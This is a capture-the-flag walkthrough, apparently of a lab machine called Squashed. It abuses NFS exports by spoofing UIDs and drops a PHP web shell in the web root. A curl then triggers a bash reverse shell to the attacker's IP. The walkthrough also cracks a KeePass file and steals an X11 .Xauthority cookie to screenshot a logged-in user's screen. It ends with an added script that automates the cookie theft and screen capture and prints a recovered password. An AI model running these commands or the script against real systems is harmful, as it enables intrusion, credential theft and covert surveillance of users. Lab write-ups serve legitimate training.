┌──(root㉿kali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.191

┌──(root㉿kali)-[/home/kali/Downloads]

└─# showmount -e 10.10.11.191

┌──(root㉿kali)-[/home/kali/Downloads]

└─# mkdir /tmp/www /tmp/home_test

┌──(root㉿kali)-[/home/kali/Downloads]

└─# sudo mount -t nfs 10.10.11.191:/home/ross /tmp/home_test

┌──(root㉿kali)-[/home/kali/Downloads]

└─# sudo mount -t nfs 10.10.11.191:/var/www/html /tmp/www

Once they are mounted we can look around. /home/ross holds a Passwords.kdbx file, which is a KeePass database, and a .Xauthority file, the cookie X11 clients present to authenticate to ross's display, among other things. /var/www/html we cannot enter even as root: the export squashes root to nobody, and the directory is owned by a UID and GID we do not have locally. Since NFS simply trusts the UID/GID the client sends, we can get around that by creating a local user with the same IDs.

┌──(root㉿kali)-[/home/kali/Downloads]

└─# cd /tmp    

┌──(root㉿kali)-[/tmp]

└─# ls -l

┌──(root㉿kali)-[/tmp]

└─# tree -fas ./home_test

┌──(root㉿kali)-[/tmp]

└─# tree -fas ./www

┌──(root㉿kali)-[/tmp]

└─# cd ./www

The listing shows the web root is owned by UID and GID 2017, so we create a local user and give it exactly those IDs. The NFS server only sees the numeric IDs the client sends, so from then on that user gets in:

┌──(root㉿kali)-[/tmp]

└─# sudo useradd sam  

┌──(root㉿kali)-[/tmp]

└─# sudo usermod -u 2017 sam

┌──(root㉿kali)-[/tmp]

└─# sudo groupmod -g 2017 sam

┌──(root㉿kali)-[/tmp]

└─# id sam

Since we can now write to the web root, we drop a PHP web shell there and use it to send ourselves a reverse shell. First a listener on our side, then the shell file written as sam, then a curl that triggers it:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nc -nlvp 443

┌──(root㉿kali)-[/tmp]

└─# su sam

$ bash

sam@kali:/tmp$ ls -l

sam@kali:/$ echo '<?php system($_REQUEST["cmd"]); ?>' > /tmp/www/shell.php

sam@kali:/$ curl "http://10.10.11.191/shell.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/10.10.14.6/443%200%3E%261%22"

┌──(root㉿kali)-[/tmp/home_test]

└─# tree

┌──(root㉿kali)-[/tmp/home_test]

└─# cd Documents            

┌──(root㉿kali)-[/tmp/home_test/Documents]

└─# ls -lrt

┌──(root㉿kali)-[/tmp/home_test/Documents]

└─# cp Passwords.kdbx /home/kali/Downloads

┌──(root㉿kali)-[/tmp/home_test/Documents]

└─# cd /home/kali/Downloads

┌──(root㉿kali)-[/home/kali/Downloads]

└─# keepass2john Passwords.kdbx

However, we also saw the .Xauthority file, and running w on the box shows that ross has an active X session that we can exploit:

alex@squashed:/home/alex$ w

The .Xauthority file is only readable by its owner, and root is squashed on the export, so to read it we again create a local user with ross's UID, which is 1001:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# sudo useradd test2

┌──(root㉿kali)-[/home/kali/Downloads]

└─# sudo usermod -u 1001 test2

┌──(root㉿kali)-[/home/kali/Downloads]

└─# su test2

test2@kali:/home/kali/Downloads$ cd /tmp/home_test/

test2@kali:/tmp/home_test$ ls -l ./.Xauthority

Now we start a Python HTTP server inside the mount and fetch the file onto the target, so alex's shell has the same .Xauthority as ross.

test2@kali:/tmp/home_test$ python3 -m http.server 8080

alex@squashed:/home/alex$ wget http://10.10.14.6:8080/.Xauthority

Before using it we fix the environment: the X client libraries look for the cookie in $HOME/.Xauthority, so HOME has to point at /home/alex, where we saved the file (setting XAUTHORITY to the file's path works too). Then xdpyinfo confirms we can talk to display :0, and the window tree shows ross has KeePass open. With some luck a screenshot of his screen will give us something juicy.

alex@squashed:/home/alex$ env

alex@squashed:/home/alex$ export HOME=/home/alex

alex@squashed:~$ env

alex@squashed:~$ xdpyinfo -display :0

alex@squashed:~$ xwininfo -root -tree -display :0

Let’s take the screenshot, and transfer it to our machine

alex@squashed:~$ xwd -root -screen -silent -display :0 > screenshot.xwd

alex@squashed:~$ file ./screenshot.xwd

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nc -nlvp 9001 > screenshot.xwd

alex@squashed:~$ nc 10.10.14.6 9001 < screenshot.xwd

┌──(root㉿kali)-[/home/kali/Downloads]

└─# convert screenshot.xwd screen.png

Opening screen.png, the password is readable in the open KeePass window:

Password: cah$mei7rai9A
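Two helpers around the .Xauthority handling above, as an added example that is not part of the original write-up: a parser for the file's record format, so the stolen cookie can be merged into our own XAUTHORITY with xauth add instead of overwriting a file under HOME, and the screenshot steps wrapped so they use XAUTHORITY rather than relying on HOME. The sample file produced by build_sample is constructed here with a made-up cookie; the host name squashed, display :0 and the output file names are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up). An .Xauthority file is a
# sequence of records: family (u16 big-endian) followed by four
# length-prefixed fields (address, display number, auth name, cookie).
# Whoever holds the cookie can talk to the X server; that is all the
# screenshot above relies on. Sample data and names are constructed here.

# Print one line per record: "family address display auth-name cookie-hex".
xauth_entries() {
    set -- $(od -An -v -tu1 "$1")          # whole file as decimal bytes
    while [ "$#" -ge 2 ]; do
        family=$(( $1 * 256 + $2 )); shift 2
        line="$family"
        i=0
        while [ "$i" -lt 4 ]; do           # address, display, name, cookie
            len=$(( $1 * 256 + $2 )); shift 2
            field=""; n=0
            while [ "$n" -lt "$len" ]; do
                if [ "$i" -eq 3 ]; then                              # cookie as hex
                    field="$field$(printf '%02x' "$1")"
                elif [ "$i" -eq 0 ] && [ "$family" -eq 0 ]; then     # FamilyInternet: dotted IPv4
                    field="$field${field:+.}$1"
                else                                                 # text field
                    field="$field$(printf "\\$(printf '%03o' "$1")")"
                fi
                shift; n=$((n + 1))
            done
            line="$line ${field:--}"
            i=$((i + 1))
        done
        printf '%s\n' "$line"
    done
}

# Turn the records into 'xauth add' commands (family 256 is FamilyLocal,
# 0 is FamilyInternet), so the cookie goes into our own XAUTHORITY file.
xauth_add_cmds() {
    xauth_entries "$1" | while read -r family addr disp name cookie; do
        case "$family" in
            256) printf 'xauth add %s/unix:%s %s %s\n' "$addr" "$disp" "$name" "$cookie" ;;
            0)   printf 'xauth add %s:%s %s %s\n' "$addr" "$disp" "$name" "$cookie" ;;
            *)   printf '# family %s (%s:%s) not handled\n' "$family" "$addr" "$disp" ;;
        esac
    done
}

# Constructed sample: one FamilyLocal record for host "squashed", display 0,
# MIT-MAGIC-COOKIE-1 with a made-up 16-byte cookie deadbeef00112233445566778899aabb.
build_sample() {
    f=$(mktemp)
    printf '\001\000\000\010squashed\000\0010\000\022MIT-MAGIC-COOKIE-1\000\020' > "$f"
    printf '\336\255\276\357\000\021\042\063\104\125\146\167\210\231\252\273' >> "$f"
    printf '%s' "$f"
}

# On the target: point the X libraries at the stolen file via XAUTHORITY
# (same effect as the 'export HOME=/home/alex' trick above), confirm access,
# check for the KeePass window and dump the root window like xwd above.
grab_screen() {
    XAUTHORITY=$1 DISPLAY=${2:-:0}
    export XAUTHORITY DISPLAY
    xdpyinfo >/dev/null 2>&1 || { echo "no access to $DISPLAY with $XAUTHORITY" >&2; return 1; }
    xwininfo -root -tree | grep -i keepass || true
    xwd -root -screen -silent > "${3:-screenshot.xwd}"
    echo "dumped ${3:-screenshot.xwd}; convert with: convert ${3:-screenshot.xwd} screen.png"
}

# ./xauth_tools.sh list stolen.Xauthority      -> prints xauth add commands
# ./xauth_tools.sh grab stolen.Xauthority :0   -> takes the screenshot
if [ "$#" -ge 1 ]; then
    case "$1" in
        list) xauth_add_cmds "$2" ;;
        grab) grab_screen "$2" "${3:-:0}" "${4:-screenshot.xwd}" ;;
    esac
fi
```

Merging with xauth add rather than replacing the file is the quieter option on a shared account: alex keeps whatever cookies were already there, and the added entry can be removed again with xauth remove.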

@SAKSHAM DIXIT
